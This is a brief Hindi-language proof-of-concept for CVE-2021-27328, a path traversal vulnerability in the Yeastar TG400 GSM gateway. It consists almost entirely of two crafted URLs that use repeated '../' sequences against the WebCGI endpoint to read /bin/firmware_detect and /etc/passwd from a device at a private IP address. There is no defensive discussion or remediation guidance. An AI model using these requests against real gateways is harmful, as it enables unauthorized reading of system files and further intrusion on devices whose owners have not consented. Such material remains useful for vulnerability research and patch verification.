
CVE-2021-27328 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, Yeastar TG400 GSM गेटवे में एक पथ ट्रैवर्सल भेद्यता, जो WebCGI एंडपॉइंट पर एक निर्मित HTTP अनुरोध के माध्यम से मनमाना फ़ाइल पढ़ने का प्रदर्शन करता है।
यह CVE-2021-27328 के लिए एक प्रूफ ऑफ कॉन्सेप्ट है
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect

http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd
